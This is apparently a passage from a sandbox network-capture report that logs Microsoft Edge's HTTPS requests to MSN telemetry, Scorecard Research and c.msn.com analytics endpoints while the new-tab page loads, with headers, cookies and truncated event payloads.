                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  2025-01-06 22:18:05 UTC | 956 | IN | HTTP/1.1 302 Found
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:05 GMT
                                                                                                                                                                  Location: /b2?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                  set-cookie: UID=1E1e49df192553de02181e61736201885; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                  set-cookie: XID=1E1e49df192553de02181e61736201885; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                  Via: 1.1 9a614f9e49eb2bcefba1d54afaaf7f80.cloudfront.net (CloudFront)
                                                                                                                                                                  X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                  X-Amz-Cf-Id: q5lUfuka-SM8gziQhzvF-HHRQgpEzWaVXYkvE1jiRtvjFoPFDeHqfg==


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  8 | 192.168.2.4 | 50004 | 20.42.65.85 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:06 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201884773&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 3857
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1
                                                                                                                                                                  2025-01-06 22:18:06 UTC | 3857 | OUT | Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-06T22:18:04.769Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"3ec3612a-69cb-49ca-95d0-32c644fb06b0","epoch":"3935259103"},"app":{"locale
                                                                                                                                                                  2025-01-06 22:18:06 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=34a4f7b247bc4e76bf482aae86caecf4&HASH=34a4&LV=202501&V=4&LU=1736201886480; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:18:06 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=c6db634c1a6c4b50b7bce0de0c0cf3d2; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:48:06 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1707
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:06 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  9 | 192.168.2.4 | 50008 | 18.173.219.113 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:06 UTC | 1012 | OUT | GET /b2?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: UID=1E1e49df192553de02181e61736201885; XID=1E1e49df192553de02181e61736201885
                                                                                                                                                                  2025-01-06 22:18:06 UTC | 326 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:06 GMT
                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                  Via: 1.1 7bd20765fb335de036eff4682be365d4.cloudfront.net (CloudFront)
                                                                                                                                                                  X-Amz-Cf-Pop: JFK52-P1
                                                                                                                                                                  X-Amz-Cf-Id: R54OSoe1GI5kmHE0kJ3YDtOa_9p1oFCnMErCy5BwmOCyRhGGQ3bHJg==


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  10 | 192.168.2.4 | 50016 | 20.110.205.119 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:06 UTC | 1261 | OUT | GET /c.gif?rnd=1736201884774&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=21dedbcc40f24d988b676b18e5a4d184&activityId=21dedbcc40f24d988b676b18e5a4d184&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=09177A4F17534286BB4134B207DC161D&MUID=1B715D3435BD60832FC8485834156189 HTTP/1.1
                                                                                                                                                                  Host: c.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; SM=T
                                                                                                                                                                  2025-01-06 22:18:07 UTC | 982 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  ETag: "9270eb7934bdb1:0"
                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                  P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                  Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                  Set-Cookie: MUID=1B715D3435BD60832FC8485834156189; domain=.msn.com; expires=Sat, 31-Jan-2026 22:18:06 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                  Set-Cookie: SRM_M=1B715D3435BD60832FC8485834156189; domain=c.msn.com; expires=Sat, 31-Jan-2026 22:18:06 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                  Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 13-Jan-2025 22:18:06 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                  Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 06-Jan-2025 22:28:06 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:06 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Content-Length: 42
                                                                                                                                                                  2025-01-06 22:18:07 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  11 | 192.168.2.4 | 50044 | 20.42.65.85 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:09 UTC | 1044 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201887861&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 11511
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                  2025-01-06 22:18:09 UTC | 11511 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-06T22:18:07.860Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"3ec3612a-69cb-49ca-95d0-32c644fb06b0","epoch":"3935259103"},"app":{"locale
                                                                                                                                                                  2025-01-06 22:18:09 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=47a89d7f00534ea4b6e55ceb003da205&HASH=47a8&LV=202501&V=4&LU=1736201889348; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:18:09 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=4d28e74a303547e9a8ea6ca635d5f6a5; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:48:09 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1487
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:08 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  12 | 192.168.2.4 | 50045 | 20.42.65.85 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:09 UTC | 1043 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201887865&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 5103
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                  2025-01-06 22:18:09 UTC | 5103 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-06T22:18:07.864Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"3ec3612a-69cb-49ca-95d0-32c644fb06b0","epoch":"3935259103"},"app":{"locale
                                                                                                                                                                  2025-01-06 22:18:12 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=c4555bd250ff4e40842a658d8d354584&HASH=c455&LV=202501&V=4&LU=1736201892684; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:18:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=b2bc21c53497470c8844bdf912b73269; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:48:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 4819
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:12 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  13 | 192.168.2.4 | 50049 | 20.42.65.85 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:09 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201888101&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 5380
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; msnup=
                                                                                                                                                                  2025-01-06 22:18:09 UTC | 5380 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-06T22:18:08.100Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"3ec3612a-69cb-49ca-95d0-32c644fb06b0","epoch":"3935259103"},"app":{"locale
                                                                                                                                                                  2025-01-06 22:18:09 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=fe73712c2e6a4dbfb2dad522d9b06abb&HASH=fe73&LV=202501&V=4&LU=1736201889582; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:18:09 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=953ca2e0252a4788bd033bcf7c08f7e4; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:48:09 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1481
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:08 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  14 | 192.168.2.4 | 50054 | 20.42.65.85 | 443 | 5664 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:10 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201888863&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 9879
                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; msnup=
                                                                                                                                                                  2025-01-06 22:18:10 UTC | 9879 | OUT | Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 36 54 32 32 3a 31 38 3a 30 38 2e 38 36 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 33 65 63 33 36 31 32 61 2d 36 39 63 62 2d 34 39 63 61 2d 39 35 64 30 2d 33 32 63 36 34 34 66 62 30 36 62 30 22 2c 22 65 70 6f 63 68 22 3a 22 33 39 33 35 32 35 39 31 30 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-06T22:18:08.862Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"3ec3612a-69cb-49ca-95d0-32c644fb06b0","epoch":"3935259103"},"app":{"loc
                                                                                                                                                                  2025-01-06 22:18:10 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=bc7eaab5215340cc93e5c633d0d1371f&HASH=bc7e&LV=202501&V=4&LU=1736201890421; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:18:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=0ac5aa0a887f49c19fb5e2a5ae05b720; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:48:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1558
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:10 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
